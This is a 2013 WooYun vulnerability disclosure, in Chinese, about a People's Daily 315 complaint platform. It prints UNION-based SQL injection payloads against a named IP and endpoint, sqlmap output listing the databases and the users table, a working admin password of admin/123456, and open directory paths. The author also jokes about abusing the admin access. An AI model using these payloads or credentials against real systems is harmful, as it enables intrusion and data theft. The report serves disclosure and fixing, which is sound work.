漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-040395
漏洞标题:人民网某315投诉平台多漏洞导致后台沦陷
相关厂商:人民网
漏洞作者: 霍大然
提交时间:2013-10-21 16:30
修复时间:2013-12-05 16:31
公开时间:2013-12-05 16:31
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-10-21: 细节已通知厂商并且等待厂商处理中
2013-10-25: 厂商已经确认,细节仅向厂商公开
2013-11-04: 细节向核心白帽子及相关领域专家公开
2013-11-14: 细节向普通白帽子公开
2013-11-24: 细节向实习白帽子公开
2013-12-05: 细节向公众公开
简要描述:
看到有人提交的人民网的转到cncert了,也提交一个:人民网某315投诉平台多漏洞导致后台沦陷
详细说明:
网站地址:
http://219.141.222.104/
一、sql注入(POST)
http://219.141.222.104:80/interface/select/data_lgi.php (POST)
password=e&username=admin
Place: POST
Parameter: password
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: password=e' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7175686371,0x6655765a7a426f664b68,0x71636d7971),NULL,NULL,NULL,NULL,NULL#&username=admin
Place: POST
Parameter: username
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: password=e&username=admin' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7175686371,0x4d69787955656a4f7063,0x71636d7971),NULL,NULL,NULL,NULL,NULL#
---
web application technology: PHP 5.3.16, Apache 2.0.64
back-end DBMS: MySQL 5
available databases [7]:
[*] cmaol
[*] enginsite_addons
[*] information_schema
[*] koosa
[*] mysql
[*] oa
[*] travel2012
web application technology: PHP 5.3.16, Apache 2.0.64
back-end DBMS: MySQL 5
Database: oa
[7 tables]
+---------+
| child |
| grand |
| node |
| object |
| options |
| pros |
| users |
+---------+
web application technology: PHP 5.3.16, Apache 2.0.64
back-end DBMS: MySQL 5
Database: oa
Table: users
[4 columns]
+--------+--------------+
| Column | Type |
+--------+--------------+
| id | int(11) |
| name | varchar(255) |
| pwd | varchar(255) |
| type | int(11) |
+--------+--------------+
数据不贴了,都是弱口令,可以登录。
二、弱口令
登录页面:
http://219.141.222.104/admin/login.html
admin/123456
可处理各种投诉,真想把张家界的那个什么金凤凰旅行社处理下(被他们那个毛导坑死了了)。
三、目录遍历
各种遍历
http://219.141.222.104/admin
http://219.141.222.104/interface/
……
漏洞证明:
修复方案:
1、参数过滤;
2、强口令;
3、禁止遍历;
版权声明:转载请注明来源 霍大然@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2013-10-25 22:46
厂商回复:
CNVD 确认并复现所述情况,已经转由CNCERT向新闻行业主管部门通报,由其后续联系网站管理方处置。
rank 15
最新状态:
暂无